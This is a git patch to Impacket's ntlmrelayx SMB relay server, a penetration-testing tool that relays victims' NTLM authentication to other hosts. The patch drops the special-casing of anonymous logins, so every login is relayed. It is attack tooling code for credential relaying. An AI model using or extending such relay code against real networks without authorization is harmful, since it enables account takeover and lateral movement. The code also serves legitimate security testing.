From 20ccf8281a6c21b4e64b11fb391158da5dbf1242 Mon Sep 17 00:00:00 2001 From: 0xdeaddood Date: Thu, 21 Oct 2021 17:37:06 -0300 Subject: [PATCH] Removed unnecessary anonymous login handling. --- .../ntlmrelayx/servers/smbrelayserver.py | 54 +++++++------------ 1 file changed, 18 insertions(+), 36 deletions(-) diff --git a/impacket/examples/ntlmrelayx/servers/smbrelayserver.py b/impacket/examples/ntlmrelayx/servers/smbrelayserver.py index c2d003b05..b5e6f5a95 100644 --- a/impacket/examples/ntlmrelayx/servers/smbrelayserver.py +++ b/impacket/examples/ntlmrelayx/servers/smbrelayserver.py @@ -1,6 +1,6 @@ # Impacket - Collection of Python classes for working with network protocols. # -# SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved. +# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved. # # This software is provided under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file @@ -291,26 +291,20 @@ def SmbSessionSetup(self, connId, smbServer, recvPacket): client = connData['SMBClient'] authenticateMessage = ntlm.NTLMAuthChallengeResponse() authenticateMessage.fromString(token) - if authenticateMessage['user_name'] != '': - # For some attacks it is important to know the authenticated username, so we store it + self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'), + authenticateMessage['user_name'].decode('utf-16le'))).upper() - self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'), - authenticateMessage['user_name'].decode('utf-16le'))).upper() - - if rawNTLM is True: - respToken2 = SPNEGO_NegTokenResp() - respToken2['ResponseToken'] = securityBlob - securityBlob = respToken2.getData() + if rawNTLM is True: + respToken2 = SPNEGO_NegTokenResp() + respToken2['ResponseToken'] = securityBlob + securityBlob = respToken2.getData() - if self.config.remove_mic: - clientResponse, errorCode = self.do_ntlm_auth(client, token, - connData['CHALLENGE_MESSAGE']['challenge']) - else: - clientResponse, errorCode = self.do_ntlm_auth(client, securityBlob, - connData['CHALLENGE_MESSAGE']['challenge']) + if self.config.remove_mic: + clientResponse, errorCode = self.do_ntlm_auth(client, token, + connData['CHALLENGE_MESSAGE']['challenge']) else: - # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials - errorCode = STATUS_ACCESS_DENIED + clientResponse, errorCode = self.do_ntlm_auth(client, securityBlob, + connData['CHALLENGE_MESSAGE']['challenge']) if errorCode != STATUS_SUCCESS: #Log this target as processed for this client @@ -379,10 +373,7 @@ def smb2TreeConnect(self, connId, smbServer, recvPacket): try: if self.config.mode.upper () == 'REFLECTION': self.targetprocessor = TargetsProcessor (singleTarget='SMB://%s:445/' % connData['ClientIP']) - if self.authUser == '/': - LOG.info('SMBD-%s: Connection from %s authenticated as guest (anonymous). Skipping target selection.' % - (connId, connData['ClientIP'])) - return self.origsmb2TreeConnect (connId, smbServer, recvPacket) + self.target = self.targetprocessor.getTarget(identity = self.authUser) if self.target is None: # No more targets to process, just let the victim to fail later @@ -544,17 +535,11 @@ def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket): client = connData['SMBClient'] authenticateMessage = ntlm.NTLMAuthChallengeResponse() authenticateMessage.fromString(token) + self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'), + authenticateMessage['user_name'].decode('utf-16le'))).upper() - if authenticateMessage['user_name'] != '': - #For some attacks it is important to know the authenticated username, so we store it - self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'), - authenticateMessage['user_name'].decode('utf-16le'))).upper() - - clientResponse, errorCode = self.do_ntlm_auth(client,sessionSetupData['SecurityBlob'], - connData['CHALLENGE_MESSAGE']['challenge']) - else: - # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials - errorCode = STATUS_ACCESS_DENIED + clientResponse, errorCode = self.do_ntlm_auth(client,sessionSetupData['SecurityBlob'], + connData['CHALLENGE_MESSAGE']['challenge']) if errorCode != STATUS_SUCCESS: # Let's return what the target returned, hope the client connects back again @@ -703,10 +688,7 @@ def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket): try: if self.config.mode.upper () == 'REFLECTION': self.targetprocessor = TargetsProcessor (singleTarget='SMB://%s:445/' % connData['ClientIP']) - if self.authUser == '/': - LOG.info('SMBD-%s: Connection from %s authenticated as guest (anonymous). Skipping target selection.' % - (connId, connData['ClientIP'])) - return self.origsmbComTreeConnectAndX (connId, smbServer, recvPacket) + self.target = self.targetprocessor.getTarget(identity = self.authUser) if self.target is None: # No more targets to process, just let the victim to fail later